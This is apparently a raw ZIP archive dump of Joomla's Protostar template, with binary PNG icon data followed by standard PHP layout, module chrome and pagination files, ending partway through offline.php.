}U��P����G"E�����=X��i?� R-<��w�&�:z�`iߧ�qqn�=�,XW31=놵C	+ZE�����Ň�\����h�qي|TzP�:�+�)�Y�,�`[)�k�OkCwYU��M�=.�������:�~�HC��n����R�BI�ۨ`1��$X@�Q���
��W^^�D��?�� �N�eCD1)��:XTӰl�I��]��{<b�>��\C��f-T�<��N�4󁲹��*�`ծ���к�g=���s���1��_���"
�.X��	,s�9��H�{�j�L��ž��M��yJ����ܵ��-��`�,�4����
��9*mr	�k�TT�X���쇲9����G�3�{î�^�}~�K�_X���40┰�nuoQM���
�`�AD��=�1��p�۴l�/#;�=>�"�Nw����Fכ��DI�@�Nw�9�
��g
Zt*��`�,D���~y<B���D*�Ja�VAݚ=��dΚ��A���7WT
�d�[�!P��!�� X�'�>}�QEU�_.�+E0MA:���/@��B�@�t�h��1�eM"a2Ei�J����ǰ���[E[�� ���n����Ql��3L������/�9 �	�q�˾.��I�Reg���cEg��n"��H�3�,��
���	k�|����&X��`+|Xa����)*Ga�cE��f��(\������1'"��yC��b��j{�j�.��3~-kXY_v��#�7��t$��bv�9G�����<�s-���� �	CP���8z��(K�XG�ۘ�j��<�i]���!���-
�9�R=p�轰Fg����/|7��?������j����T����(a7�V5a�Q�DZR�p2�0,-�������ծ^P�ϊS�9��Kj��������9�͛���y����� �`�����HEA^�5݂qH@7ܬ�`v���o�$!!aYa��֜=J�6���g�_Ys�?��� �6)X��aq>��s
D2��~_�i�H��vc���L�>)�0%,�o��N���?���;�������g�U�)��.��"��K�L5��� e�VD:�Є����n>�,\n/���:Q-�[�\�)��' ��9;�Я^K�s R�c}��@ZϥC���)��i&k�w��D`�5�y�,�.�V*��F��̐��!�2Y�uy�M�*������BCqY(�k<�px��4��j�k��+�m�vӒ�Q{�v����`S�7j�{��x �
-
>�q'G���~��H��f�U�MY��A+�5����Q���g	�
�
�A�>MڞV�y[�,Xw^4�	�eL����}�ű����i/�0�2���&�d�!ٖH+t���?��d>�`�Xq�`ڏ��a"�UP�;�� �Vڣw��
:������9"Ҁ�N��TݴS����g ���ߔͫφjaټ��-+N;�VuM�Z~>b��:���x�
���27���]���t^������^m?a�؀�蓂��1XK����;��
�}%�6�ᢺ����#;ޭ9��\�F8�nP�*��i��k�EL�d�/���bvF;���!��8��I�,�`�ϻ!1?��Y^.����'�n�s�0����"�
���J��8�w����M�~�p).��okAG���H�!\	�m[��h��<j+�cw-�qhS���:V�7�#�\<�J�*��*�b;������܈�5����~A�~Bf�Q@$��E�6�)�[���X�q��<���0}\����p��
��X\bU8o}���D�w�.�a=uAp^n��.n�f��۶ĨHj	o �|]@\�`$�jW�R�R���o����݆�5ē�ʂo���p��jq�{���.g�?����'�~��m�M��6�Z�K�Q �	�8,F�ڱ����k����7�B��)��~D�[�%(2#X8�y3�{�4V0��
V`ۣ���|�~7d��D8����4�jc{�Rs�
W��L��>^B�˿q����

F�Bc�Px8�#�{�2��g�$�����1���
�C�T��tɇ�&��$�%[�Gg/�0�Eg~ڈ<�b��%�8�բ�g�b,�q���
������˲�۳�b]PP�G H�4�s�C(�����c���d��"��6�]i�[��k���2��>����ŀ_��l�R�������º�I��XfE����y����&�͒�����~�j��^"^x ]8ءi!����*z��B���zҊC=��@>�fO1��eb��8�V�-6�9Q��:`�����Rɜ���}��b�q@�rs����+"�`�7&A���V�`QT�O�\7Z�U�`q�e:�]�>��e��P�v�+�q�)(���U�Џd�j $�tDZ�`�S�0ê���+Ô���G������d�A�A�}V����<XMs:=6Y9i�o�J�,�c�'X�!c��ñBv	��R0[��.c��2N��uȇ
}|p�S~?}Z��b�?�:ߊ]{}�w�K rG2����(Y�)��+�q`���B{5���_��X�\����?�X"��I=�K%n�^� �
+�¿[d��.`�TNN��
'�p��B�m�j��Ǘ�'��/ ��pG'ny�ӊ�c%��d�k9��x`�c%�J��q�ܲ\A�J8VB~ԉ�m3~^�~H��U��I�X�5~���趋PJN��}c��ǀȐ!��Dp5/b�di:�*���@�����<�-#֓L��ެ5-��D�FQ��&I�d0(-+�&�UT��BҚ?fgL��@��z Y����t�gȐa�A�a(�T6�\D)���ˏ�����fv�퀰,�j��b�2"������A7�}�>$��fm���@dȐa�!�j_�`��WX�a����hMaۂ���S�	D<@X|�zVm�/�~�y�?@�Ώ�[�ߟ����,
b��!C���(��/��;h���[���$�Y�[q��15
�&�~�; K表�?w���={�19jο����O����{��J���˚
D�F$ƓqJj�W�ϔ�`�7�J���$ RI�>fr(�=�ꏐ���]�Ȑ!��$����CP�8�S\b��ɘ�=4~) Rɇ�s~�`���j�K��!n�]���d 2d�0r�P/����K!X�Q#�1
d-v8�W�ܼbw ~6b���=IъtJg=�z0���BD�F.�1�r����iu�h��@7�I�t���l���W8�π���:�ú��}����!C��L�
���VX�<"u�j!XY̕����X�5D�@�|��6�A��e��V����
��e2d�0������kD(~�IEND�B`�PK!��]��'protostar/images/system/rating_star.pngnu&1i��PNG


IHDRVu\��IDATxڕ�=@@`g�K��!����8�^4:��p�d^�$"o�H���LCz�F�D:�
R�g�e6�H�PC	;+9S�	h�A����M�Bq�\���0(�~���l�
Dl�̒!t�^2��P�C���2:;�Uư���UIEND�B`�PK!W9����-protostar/images/system/rating_star_blank.pngnu&1i��PNG


IHDR�|�l�IDATxc@Y"�%��>�}؄�\�!B��%�����e�� �d�E,\�]�P PD�+��3\�K&�
�p�\T��%� ��|uy���o�,6����V0K��AHh93��Ό.Z �n><�9��IEND�B`�PK!J!G`��%protostar/images/system/sort_desc.pngnu&1i��PNG


IHDR�|�lNIDATx��1�`^��4	/�q�+�jo�!2�o|�u���\\�b�8�ڭ���ݙ��ZL`��0E�1��i���T�IEND�B`�PK!��V\��$protostar/images/system/sort_asc.pngnu&1i��PNG


IHDR�|�lGIDATx��G@!��^�Wp���';�	�7�K��������U��6=ҢŎ4k�$�U��OT��A�x���H���IEND�B`�PK!{�RZZprotostar/html/modules.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * This is a file to add template specific chrome to module rendering.  To use it you would
 * set the style attribute for the given module(s) include in your template to use the style
 * for each given modChrome function.
 *
 * eg. To render a module mod_test in the submenu style, you would use the following include:
 * <jdoc:include type="module" name="test" style="submenu" />
 *
 * This gives template designers ultimate control over how modules are rendered.
 *
 * NOTICE: All chrome wrapping methods should be named: modChrome_{STYLE} and take the same
 * two arguments.
 */

/*
 * Module chrome for rendering the module in a submenu
 */
function modChrome_no($module, &$params, &$attribs)
{
	if ($module->content)
	{
		echo $module->content;
	}
}

function modChrome_well($module, &$params, &$attribs)
{
	$moduleTag     = htmlspecialchars($params->get('module_tag', 'div'), ENT_QUOTES, 'UTF-8');
	$bootstrapSize = (int) $params->get('bootstrap_size', 0);
	$moduleClass   = $bootstrapSize !== 0 ? ' span' . $bootstrapSize : '';
	$headerTag     = htmlspecialchars($params->get('header_tag', 'h3'), ENT_QUOTES, 'UTF-8');
	$headerClass   = htmlspecialchars($params->get('header_class', 'page-header'), ENT_COMPAT, 'UTF-8');

	if ($module->content)
	{
		echo '<' . $moduleTag . ' class="well ' . htmlspecialchars($params->get('moduleclass_sfx'), ENT_COMPAT, 'UTF-8') . $moduleClass . '">';

			if ($module->showtitle)
			{
				echo '<' . $headerTag . ' class="' . $headerClass . '">' . $module->title . '</' . $headerTag . '>';
			}

			echo $module->content;
		echo '</' . $moduleTag . '>';
	}
}
PK!AҘ�ii5protostar/html/com_media/imageslist/default_image.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  com_media
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\Registry\Registry;

$params     = new Registry;
$dispatcher = JEventDispatcher::getInstance();
$dispatcher->trigger('onContentBeforeDisplay', array('com_media.file', &$this->_tmp_img, &$params, 0));
?>

<li class="imgOutline thumbnail height-80 width-80 center">
	<a class="img-preview" href="javascript:ImageManager.populateFields('<?php echo $this->escape($this->_tmp_img->path_relative); ?>')" title="<?php echo $this->escape($this->_tmp_img->name); ?>" >
		<div class="imgThumb">
			<div class="imgThumbInside">
			<?php echo JHtml::_('image', $this->baseURL . '/' . $this->escape($this->_tmp_img->path_relative), JText::sprintf('COM_MEDIA_IMAGE_TITLE', $this->_tmp_img->title, JHtml::_('number.bytes', $this->_tmp_img->size)), array('width' => $this->_tmp_img->width_60, 'height' => $this->_tmp_img->height_60)); ?>
			</div>
		</div>
		<div class="imgDetails small">
			<?php echo JHtml::_('string.truncate', $this->escape($this->_tmp_img->name), 10, false); ?>
		</div>
	</a>
</li>
<?php
$dispatcher->trigger('onContentAfterDisplay', array('com_media.file', &$this->_tmp_img, &$params, 0));
PK!%��Rdd6protostar/html/com_media/imageslist/default_folder.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  com_media
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$input = JFactory::getApplication()->input;
?>
<li class="imgOutline thumbnail height-80 width-80 center">
	<a href="index.php?option=com_media&amp;view=imagesList&amp;tmpl=component&amp;folder=<?php echo rawurlencode($this->_tmp_folder->path_relative); ?>&amp;asset=<?php echo $input->getCmd('asset');?>&amp;author=<?php echo $input->getCmd('author');?>" target="imageframe">
		<div class="imgFolder">
			<span class="icon-folder-2"></span>
		</div>
		<div class="small">
			<?php echo JHtml::_('string.truncate', $this->escape($this->_tmp_folder->name), 10, false); ?>
		</div>
	</a>
</li>
PK!�+A��0protostar/html/layouts/joomla/system/message.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.protostar
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$msgList = $displayData['msgList'];

$alert = array('error' => 'alert-error', 'warning' => '', 'notice' => 'alert-info', 'message' => 'alert-success');
?>
<div id="system-message-container">
	<?php if (is_array($msgList) && !empty($msgList)) : ?>
		<div id="system-message">
			<?php foreach ($msgList as $type => $msgs) : ?>
				<div class="alert <?php echo isset($alert[$type]) ? $alert[$type] : 'alert-' . $type; ?>">
					<?php // This requires JS so we should add it through JS. Progressive enhancement and stuff. ?>
					<a class="close" data-dismiss="alert">×</a>

					<?php if (!empty($msgs)) : ?>
						<h4 class="alert-heading"><?php echo JText::_($type); ?></h4>
						<div>
							<?php foreach ($msgs as $msg) : ?>
								<div class="alert-message"><?php echo $msg; ?></div>
							<?php endforeach; ?>
						</div>
					<?php endif; ?>
				</div>
			<?php endforeach; ?>
		</div>
	<?php endif; ?>
</div>
PK!�]�^MM1protostar/html/layouts/joomla/form/field/user.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

extract($displayData);

/**
 * Layout variables
 * -----------------
 * @var   string   $autocomplete    Autocomplete attribute for the field.
 * @var   boolean  $autofocus       Is autofocus enabled?
 * @var   string   $class           Classes for the input.
 * @var   string   $description     Description of the field.
 * @var   boolean  $disabled        Is this field disabled?
 * @var   string   $group           Group the field belongs to. <fields> section in form XML.
 * @var   boolean  $hidden          Is this field hidden in the form?
 * @var   string   $hint            Placeholder for the field.
 * @var   string   $id              DOM id of the field.
 * @var   string   $label           Label of the field.
 * @var   string   $labelclass      Classes to apply to the label.
 * @var   boolean  $multiple        Does this field support multiple values?
 * @var   string   $name            Name of the input field.
 * @var   string   $onchange        Onchange attribute for the field.
 * @var   string   $onclick         Onclick attribute for the field.
 * @var   string   $pattern         Pattern (Reg Ex) of value of the form field.
 * @var   boolean  $readonly        Is this field read only?
 * @var   boolean  $repeat          Allows extensions to duplicate elements.
 * @var   boolean  $required        Is this field required?
 * @var   integer  $size            Size attribute of the input.
 * @var   boolean  $spellcheck      Spellcheck state for the form field.
 * @var   string   $validate        Validation rules to apply.
 * @var   string   $value           Value attribute of the field.
 * @var   array    $checkedOptions  Options that will be set as checked.
 * @var   boolean  $hasValue        Has this field a value assigned?
 * @var   array    $options         Options available for this field.
 *
 * @var   string   $userName        The user name
 * @var   mixed    $groups          The filtering groups (null means no filtering)
 * @var   mixed    $exclude         The users to exclude from the list of users
 */

// Set the link for the user selection page
$link = 'index.php?option=com_users&amp;view=users&amp;layout=modal&amp;tmpl=component&amp;required='
	. ($required ? 1 : 0) . '&amp;field={field-user-id}&amp;ismoo=0'
	. (isset($groups) ? ('&amp;groups=' . base64_encode(json_encode($groups))) : '')
	. (isset($excluded) ? ('&amp;excluded=' . base64_encode(json_encode($excluded))) : '');

// Invalidate the input value if no user selected
if (JText::_('JLIB_FORM_SELECT_USER') === htmlspecialchars($userName, ENT_COMPAT, 'UTF-8'))
{
	$userName = '';
}

if (!$readonly)
{
	JHtml::_('script', 'jui/fielduser.min.js', array('version' => 'auto', 'relative' => true));
}
?>
<?php // Create a dummy text field with the user name. ?>
<div class="field-user-wrapper"
	data-url="<?php echo $link; ?>"
	data-modal=".modal"
	data-modal-width="100%"
	data-modal-height="400px"
	data-input=".field-user-input"
	data-input-name=".field-user-input-name"
	data-button-select=".button-select"
	>
	<div class="input-append">
		<input
			type="text" id="<?php echo $id; ?>"
			value="<?php echo  htmlspecialchars($userName, ENT_COMPAT, 'UTF-8'); ?>"
			placeholder="<?php echo JText::_('JLIB_FORM_SELECT_USER'); ?>"
			readonly
			class="field-user-input-name <?php echo $class ? (string) $class : ''?>"
			<?php echo $size ? ' size="' . (int) $size . '"' : ''; ?>
			<?php echo $required ? 'required' : ''; ?>/>
		<?php if (!$readonly) : ?>
			<button
				type="button"
				class="btn btn-primary button-select"
				title="<?php echo JText::_('JLIB_FORM_CHANGE_USER') ?>"
				aria-label="<?php echo JText::_('JLIB_FORM_CHANGE_USER') ?>"
				>
				<span class="icon-user" aria-hidden="true"></span>
			</button>
			<?php echo JHtml::_(
				'bootstrap.renderModal',
				'userModal_' . $id,
				array(
					'title'  => JText::_('JLIB_FORM_CHANGE_USER'),
					'closeButton' => true,
					'footer' => '<button type="button" class="btn" data-dismiss="modal">' . JText::_('JCANCEL') . '</button>',
				)
			); ?>
		<?php endif; ?>
	</div>
	<?php // Create the real field, hidden, that stored the user id. ?>
	<?php if (!$readonly) : ?>
		<input type="hidden" id="<?php echo $id; ?>_id" name="<?php echo $name; ?>" value="<?php echo (int) $value; ?>"
			class="field-user-input <?php echo $class ? (string) $class : ''?>"
			data-onchange="<?php echo $this->escape($onchange); ?>"/>
	<?php endif; ?>
</div>
PK!3�����2protostar/html/layouts/joomla/form/field/media.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Layout variables
 * ---------------------
 *
 * @var  string   $asset The asset text
 * @var  string   $authorField The label text
 * @var  integer  $authorId The author id
 * @var  string   $class The class text
 * @var  boolean  $disabled True if field is disabled
 * @var  string   $folder The folder text
 * @var  string   $id The label text
 * @var  string   $link The link text
 * @var  string   $name The name text
 * @var  string   $preview The preview image relative path
 * @var  integer  $previewHeight The image preview height
 * @var  integer  $previewWidth The image preview width
 * @var  string   $onchange  The onchange text
 * @var  boolean  $readonly True if field is readonly
 * @var  integer  $size The size text
 * @var  string   $value The value text
 * @var  string   $src The path and filename of the image
 */
extract($displayData);

// The button.
if ($disabled != true)
{
	JHtml::_('bootstrap.tooltip');
}

$attr = '';

// Initialize some field attributes.
$attr .= !empty($class) ? ' class="input-small hasTooltip field-media-input ' . $class . '"' : ' class="input-small hasTooltip field-media-input"';
$attr .= !empty($size) ? ' size="' . $size . '"' : '';

// Initialize JavaScript field attributes.
$attr .= !empty($onchange) ? ' onchange="' . $onchange . '"' : '';

switch ($preview)
{
	case 'no': // Deprecated parameter value
	case 'false':
	case 'none':
		$showPreview = false;
		$showAsTooltip = false;
		break;
	case 'yes': // Deprecated parameter value
	case 'true':
	case 'show':
		$showPreview = true;
		$showAsTooltip = false;
		break;
	case 'tooltip':
	default:
		$showPreview = true;
		$showAsTooltip = true;
		break;
}

// Pre fill the contents of the popover
if ($showPreview)
{
	if ($value && file_exists(JPATH_ROOT . '/' . $value))
	{
		$src = JUri::root() . $value;
	}
	else
	{
		$src = JText::_('JLIB_FORM_MEDIA_PREVIEW_EMPTY');
	}
}

// The URL for the modal
$url    = ($readonly ? ''
	: ($link ?: 'index.php?option=com_media&amp;view=images&amp;tmpl=component&amp;asset='
		. $asset . '&amp;author=' . $authorId)
	. '&amp;fieldid={field-media-id}&amp;ismoo=0&amp;folder=' . $folder);
?>
<div class="field-media-wrapper"
	data-basepath="<?php echo JUri::root(); ?>"
	data-url="<?php echo $url; ?>"
	data-modal=".modal"
	data-modal-width="100%"
	data-modal-height="400px"
	data-input=".field-media-input"
	data-button-select=".button-select"
	data-button-clear=".button-clear"
	data-button-save-selected=".button-save-selected"
	data-preview="<?php echo $showPreview ? 'true' : 'false'; ?>"
	data-preview-as-tooltip="<?php echo $showAsTooltip ? 'true' : 'false'; ?>"
	data-preview-container=".field-media-preview"
	data-preview-width="<?php echo $previewWidth; ?>"
	data-preview-height="<?php echo $previewHeight; ?>"
>
	<?php
	// Render the modal
	echo JHtml::_('bootstrap.renderModal',
		'imageModal_'. $id,
		array(
			'title' => JText::_('JLIB_FORM_CHANGE_IMAGE'),
			'closeButton' => true,
			'footer' => '<button type="button" class="btn" data-dismiss="modal">' . JText::_('JCANCEL') . '</button>'
		)
	);

	JHtml::_('script', 'media/mediafield.min.js', array('version' => 'auto', 'relative' => true));
	?>
	<?php if ($showPreview && $showAsTooltip) : ?>
	<div class="input-prepend input-append">
		<span rel="popover" class="add-on pop-helper field-media-preview"
			title="<?php echo	JText::_('JLIB_FORM_MEDIA_PREVIEW_SELECTED_IMAGE'); ?>" data-content="<?php echo JText::_('JLIB_FORM_MEDIA_PREVIEW_EMPTY'); ?>"
			data-original-title="<?php echo JText::_('JLIB_FORM_MEDIA_PREVIEW_SELECTED_IMAGE'); ?>" data-trigger="hover">
			<span class="icon-eye" aria-hidden="true"></span>
		</span>
	<?php else: ?>
	<div class="input-append">
	<?php endif; ?>
		<input type="text" name="<?php echo $name; ?>" id="<?php echo $id; ?>" value="<?php echo htmlspecialchars($value, ENT_COMPAT, 'UTF-8'); ?>" readonly="readonly"<?php echo $attr; ?>/>
		<?php if ($disabled != true) : ?>
			<button type="button" class="btn button-select"><?php echo JText::_("JLIB_FORM_BUTTON_SELECT"); ?></button>
			<button
				type="button"
				class="btn hasTooltip button-clear"
				title="<?php echo JText::_("JLIB_FORM_BUTTON_CLEAR"); ?>"
				aria-label="<?php echo JText::_("JLIB_FORM_BUTTON_CLEAR"); ?>"
				>
				<span class="icon-remove" aria-hidden="true"></span>
			</button>
		<?php endif; ?>
	</div>
	<?php if ($showPreview && !$showAsTooltip) : ?>
		<div class="field-media-preview" style="width: <?php echo $previewWidth; ?>px; max-height: <?php echo $previewHeight; ?>px;margin-top:10px;"></div>
	<?php endif; ?>
</div>
PK!��3�
�
;protostar/html/layouts/joomla/form/field/contenthistory.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Layout variables
 * -----------------
 * @var   string   $autocomplete    Autocomplete attribute for the field.
 * @var   boolean  $autofocus       Is autofocus enabled?
 * @var   string   $class           Classes for the input.
 * @var   string   $description     Description of the field.
 * @var   boolean  $disabled        Is this field disabled?
 * @var   string   $group           Group the field belongs to. <fields> section in form XML.
 * @var   boolean  $hidden          Is this field hidden in the form?
 * @var   string   $hint            Placeholder for the field.
 * @var   string   $id              DOM id of the field.
 * @var   string   $label           Label of the field.
 * @var   string   $labelclass      Classes to apply to the label.
 * @var   boolean  $multiple        Does this field support multiple values?
 * @var   string   $name            Name of the input field.
 * @var   string   $onchange        Onchange attribute for the field.
 * @var   string   $onclick         Onclick attribute for the field.
 * @var   string   $pattern         Pattern (Reg Ex) of value of the form field.
 * @var   boolean  $readonly        Is this field read only?
 * @var   boolean  $repeat          Allows extensions to duplicate elements.
 * @var   boolean  $required        Is this field required?
 * @var   integer  $size            Size attribute of the input.
 * @var   boolean  $spellcheck       Spellcheck state for the form field.
 * @var   string   $validate        Validation rules to apply.
 * @var   string   $value           Value attribute of the field.
 * @var   array    $checkedOptions  Options that will be set as checked.
 * @var   boolean  $hasValue        Has this field a value assigned?
 * @var   array    $options         Options available for this field.
 *
 * @var   string   $link            The link for the content history page
 * @var   string   $label           The label text
 */
extract($displayData);

echo JHtml::_(
	'bootstrap.renderModal',
	'versionsModal',
	array(
		'url'    => $link,
		'title'  => $label,
		'height' => '300px',
		'width'  => '800px',
		'footer' => '<button type="button" class="btn" data-dismiss="modal">'
			. JText::_('JLIB_HTML_BEHAVIOR_CLOSE') . '</button>'
	)
);

?>
<button type="button" onclick="jQuery('#versionsModal').modal('show')" class="btn" data-toggle="modal" title="<?php echo $label; ?>">
	<span class="icon-archive" aria-hidden="true"></span><?php echo $label; ?>
</button>
PK!O��}��protostar/html/pagination.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * This is a file to add template specific chrome to pagination rendering.
 *
 * pagination_list_footer
 * 	Input variable $list is an array with offsets:
 * 		$list[limit]		: int
 * 		$list[limitstart]	: int
 * 		$list[total]		: int
 * 		$list[limitfield]	: string
 * 		$list[pagescounter]	: string
 * 		$list[pageslinks]	: string
 *
 * pagination_list_render
 * 	Input variable $list is an array with offsets:
 * 		$list[all]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[start]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[previous]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[next]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[end]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[pages]
 * 			[{PAGE}][data]		: string
 * 			[{PAGE}][active]	: boolean
 *
 * pagination_item_active
 * 	Input variable $item is an object with fields:
 * 		$item->base	: integer
 * 		$item->link	: string
 * 		$item->text	: string
 *
 * pagination_item_inactive
 * 	Input variable $item is an object with fields:
 * 		$item->base	: integer
 * 		$item->link	: string
 * 		$item->text	: string
 *
 * This gives template designers ultimate control over how pagination is rendered.
 *
 * NOTE: If you override pagination_item_active OR pagination_item_inactive you MUST override them both
 */

/**
 * Renders the pagination footer
 *
 * @param   array   $list  Array containing pagination footer
 *
 * @return  string         HTML markup for the full pagination footer
 *
 * @since   3.0
 */
function pagination_list_footer($list)
{
	$html = "<div class=\"pagination\">\n";
	$html .= $list['pageslinks'];
	$html .= "\n<input type=\"hidden\" name=\"" . $list['prefix'] . "limitstart\" value=\"" . $list['limitstart'] . "\" />";
	$html .= "\n</div>";

	return $html;
}

/**
 * Renders the pagination list
 *
 * @param   array   $list  Array containing pagination information
 *
 * @return  string         HTML markup for the full pagination object
 *
 * @since   3.0
 */
function pagination_list_render($list)
{
	// Calculate to display range of pages
	$currentPage = 1;
	$range = 1;
	$step = 5;
	foreach ($list['pages'] as $k => $page)
	{
		if (!$page['active'])
		{
			$currentPage = $k;
		}
	}
	if ($currentPage >= $step)
	{
		if ($currentPage % $step === 0)
		{
			$range = ceil($currentPage / $step) + 1;
		}
		else
		{
			$range = ceil($currentPage / $step);
		}
	}

	$html  = '<nav role="navigation" aria-label="' . JText::_('JLIB_HTML_PAGINATION') . '">';
	$html .= '<ul class="pagination-list">';
	$html .= $list['start']['data'];
	$html .= $list['previous']['data'];

	foreach ($list['pages'] as $k => $page)
	{
		if ($k !== $currentPage && $k !== $range * $step - $step
			&& ($k % $step === 0 || $k === $range * $step - ($step + 1))
			&& in_array($k, range($range * $step - ($step + 1), $range * $step)))
		{
			$page['data'] = preg_replace('#(<a.*?>).*?(</a>)#', '$1...$2', $page['data']);
		}

		$html .= $page['data'];
	}

	$html .= $list['next']['data'];
	$html .= $list['end']['data'];

	$html .= '</ul>';
	$html .= '</nav>';
	return $html;
}

/**
 * Renders an active item in the pagination block
 *
 * @param   JPaginationObject  $item  The current pagination object
 *
 * @return  string                    HTML markup for active item
 *
 * @since   3.0
 */
function pagination_item_active(&$item)
{
	$class = '';

	// Check for "Start" item
	if ($item->text === JText::_('JLIB_HTML_START'))
	{
		$display = '<span class="icon-first" aria-hidden="true"></span>';
		$aria    = JText::sprintf('JLIB_HTML_GOTO_POSITION', strtolower($item->text));
	}

	// Check for "Prev" item
	if ($item->text === JText::_('JPREV'))
	{
		$display = '<span class="icon-previous" aria-hidden="true"></span>';
		$aria    = JText::sprintf('JLIB_HTML_GOTO_POSITION', strtolower($item->text));
	}

	// Check for "Next" item
	if ($item->text === JText::_('JNEXT'))
	{
		$display = '<span class="icon-next" aria-hidden="true"></span>';
		$aria    = JText::sprintf('JLIB_HTML_GOTO_POSITION', strtolower($item->text));
	}

	// Check for "End" item
	if ($item->text === JText::_('JLIB_HTML_END'))
	{
		$display = '<span class="icon-last" aria-hidden="true"></span>';
		$aria    = JText::sprintf('JLIB_HTML_GOTO_POSITION', strtolower($item->text));
	}

	// If the display object isn't set already, just render the item with its text
	if (!isset($display))
	{
		$display = $item->text;
		$aria    = JText::sprintf('JLIB_HTML_GOTO_PAGE', $item->text);
		$class   = ' class="hidden-phone"';
	}

	return '<li' . $class . '><a title="' . $item->text . '" href="' . $item->link . '" class="pagenav" aria-label="' . $aria . '">' . $display . '</a></li>';

}

/**
 * Renders an inactive item in the pagination block
 *
 * @param   JPaginationObject  $item  The current pagination object
 *
 * @return  string  HTML markup for inactive item
 *
 * @since   3.0
 */
function pagination_item_inactive(&$item)
{
	// Check for "Start" item
	if ($item->text === JText::_('JLIB_HTML_START'))
	{
		return '<li class="disabled"><a><span class="icon-first" aria-hidden="true"></span></a></li>';
	}

	// Check for "Prev" item
	if ($item->text === JText::_('JPREV'))
	{
		return '<li class="disabled"><a><span class="icon-previous" aria-hidden="true"></span></a></li>';
	}

	// Check for "Next" item
	if ($item->text === JText::_('JNEXT'))
	{
		return '<li class="disabled"><a><span class="icon-next" aria-hidden="true"></span></a></li>';
	}

	// Check for "End" item
	if ($item->text === JText::_('JLIB_HTML_END'))
	{
		return '<li class="disabled"><a><span class="icon-last" aria-hidden="true"></span></a></li>';
	}

	// Check if the item is the active page
	if (isset($item->active) && $item->active)
	{
		$aria = JText::sprintf('JLIB_HTML_PAGE_CURRENT', $item->text);

		return '<li class="active hidden-phone"><a aria-current="true" aria-label="' . $aria . '">' . $item->text . '</a></li>';
	}

	// Doesn't match any other condition, render a normal item
	return '<li class="disabled hidden-phone"><a>' . $item->text . '</a></li>';
}
PK!O�m��protostar/offline.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$twofactormethods = JAuthenticationHelper::getTwoFactorMethods();
$app              = JFactory::getApplication();

// Output as HTML5
$this->setHtml5(true);

$fullWidth = 1;

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Add template js
JHtml::_('script', 'template.js', array('version' => 'auto', 'relative' => true));

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Add Stylesheets
JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'offline.css', array('version' => 'auto', 'relative' => true));

// Use of Google Font
if ($this->params->get('googleFont'))
{
	JHtml::_('stylesheet', 'https://fonts.googleapis.com/css?family=' . $this->params->get('googleFontName'));
	$this->addStyleDeclaration("
	h1, h2, h3, h4, h5, h6, .site-title {
		font-family: '" . str_replace('+', ' ', $this->params->get('googleFontName')) . "', sans-serif;
	}");
}

// Template color
if ($this->params->get('templateColor'))
{
	$this->addStyleDeclaration('
	body.site {
		border-top: 3px solid ' . $this->params->get('templateColor') . ';
		background-color: ' . $this->params->get('templateBackgroundColor') . ';
	}
	a {
		color: ' . $this->params->get('templateColor') . ';
	}
	.nav-list > .active > a,
	.nav-list > .active > a:hover,
	.dropdown-menu li > a:hover,
	.dropdown-menu .active > a,
	.dropdown-menu .active > a:hover,
	.nav-pills > .active > a,
	.nav-pills > .active > a:hover,
	.btn-primary {
		background: ' . $this->params->get('templateColor') . ';
	}');
}

// Check for a custom CSS file
JHtml::_('stylesheet', 'user.css', array('version' => 'auto', 'relative' => true));

// Check for a custom js file
JHtml::_('script', 'user.js', array('version' => 'auto', 'relative' => true));

// Load optional RTL Bootstrap CSS
JHtml::_('bootstrap.loadCss', false, $this->direction);

// Logo file or site title param
$sitename = htmlspecialchars($app->get('sitename'), ENT_QUOTES, 'UTF-8');

if ($this->params->get('logoFile'))
{
